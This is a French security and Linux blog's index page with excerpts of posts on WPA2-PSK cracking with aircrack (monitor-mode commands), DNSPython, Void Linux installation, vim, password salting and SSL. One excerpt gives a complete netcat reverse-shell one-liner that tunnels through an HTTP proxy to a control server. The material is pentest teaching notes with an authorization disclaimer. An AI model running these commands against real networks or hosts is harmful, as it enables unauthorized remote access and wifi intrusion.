Cheatsheet : WPA2-PSK

Posted on mer. 20 mai 2020 in cheatsheet • Tagged with infosec, pentest, wifi, aircrack

Disclaimer

N'effectuez ces manipulations que sur des réseaux/machines pour lesquelles vous avez une autorisation explicite.

Mode monitoring

  • Désactiver la gestion de l'interface par NetworkManager :
nmcli dev set wlan0 managed no
  • Activer le mode monitoring sur l'interface :
airmon-ng start wlan0

L'interface de monitoring est maintenant wlan0mon ou assimilé (check avec …


Continue reading

Post-it : Reverse shell à travers un proxy HTTP

Posted on ven. 14 juin 2019 in post-it • Tagged with pentest, post-exploitation

Obtenir un reverse shell :

  • via netcat
  • sans droits root
  • en traversant un proxy HTTP
mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1 | nc -X connect -x [IP Proxy]:[Port Proxy] [IP du serveur de contrôle] [Port en écoute pour le reverse shell] > /tmp/f; rm /tmp/f …

Continue reading

DNSPython : la boite à outil du DNS en python

Posted on ven. 19 avril 2019 in tuto • Tagged with python, dns

DNSPython est un module qui permet de forger et d'envoyer des requêtes DNS, des plus classiques aux plus complexes. Des fonctions de haut niveau vont permettre d'effectuer des requêtes courantes très simplement, et des fonctions de bas niveau permettant de créer sa requête pour prendre en compte les cas les …


Continue reading

Installation de Void Linux : Full disk encryption, dualboot et UEFI

Posted on ven. 05 avril 2019 in tuto • Tagged with linux, void, install

Je viens de changer de laptop, et qui dit nouveau laptop, dit nouvelle installation de Linux !

Je reste fidèle à Void Linux que j'utilisais déjà sur mon précédent ordinateur, mais j'ai décidé de conserver le Windows en dual boot au cas où. Donc les caractéristiques de l'installation :

  • Dualboot Windows / Linux …

Continue reading

Modifier la taille de la police du TTY pour les écrans HiDPI

Posted on mer. 27 mars 2019 in post-it • Tagged with linux, astuce

Hello !

Aujourd'hui petite astuce en passant : je viens d'acheter un nouveau PC avec un magnifique écran HiDPI (écran de taille petite ou moyenne avec une très grande résolution). Ce qui est très beau, mais l'installation de Void Linux se faisant via un terminal, les caractères sont ridiculement petits.

Pas de …


Continue reading

Création d'un lab de pentest à la maison

Posted on jeu. 18 octobre 2018 in vrac • Tagged with pentest, tools, virtualisation, lab

Depuis un certain temps, j'avais dans la tête l'idée de me créer un lab de pentest chez moi. Le but était d'avoir un "micro-réseau" d'entreprise (avec les éléments qu'on retrouve souvent dans une entreprise classique) pour pouvoir tester des outils et méthodes et monter en compétences sur les différentes technos …


Continue reading

Encore plus de vim-fu : Gestion des buffers, fenêtres et onglets sous vim (vim-fu partie 2 !)

Posted on dim. 18 février 2018 in tuto • Tagged with vim, linux, sysadmin

Trois ans après un premier tuto sur les bases de vim et deux ans après un tuto sur les fonctionnalités avancées, on est repartis pour toujours plus d'astuces pour vim ! (oui, mon rythme de publication ne ressemble à rien...) Du coup, aujourd'hui, on va voir comment vim gère les fichiers …


Continue reading

Stockage de mots de passe : le sel c'est bon pour le coeur

Posted on mer. 18 janvier 2017 in vrac • Tagged with password, dropbox, infosec, chiffrement

On entend parler régulièrement de fuites de données, en particulier de mots de passe. Le problème est assez important, puisqu'on sait tous que la majorité des gens réutilisent leurs mots de passe sur différents services. Du coup, il ne faut JAMAIS stocker des mots de passe en clair dans une …


Continue reading

Une minuscule vous manque et tout est dépeuplé

Posted on mar. 10 janvier 2017 in vrac • Tagged with package, Debian, nessus, Kali

Salut à tous et bonne année 2017 ! (ça, c'est fait)

Je partage ma petite minute pétage de câble. En ce moment je bosse sur la création d'un iso custom pour Kali Linux qui intègre par défaut un certain nombre d'outils qui ne sont pas présents sur Kali de base, par …


Continue reading

SSL est mort !

Posted on jeu. 14 juillet 2016 in vrac • Tagged with ssl, chiffrement, https

Bon, aujourd'hui c'est la fête nationale, alors je me dois de faire une activité typiquement française. Je vais râler.

SSL est mort

Je vais râler contre tous ces gens qui disent sécuriser leur application avec SSL, qui parlent de certificats SSL, de connexions SSL. Pourquoi donc ? C'est bien de chiffrer …


Continue reading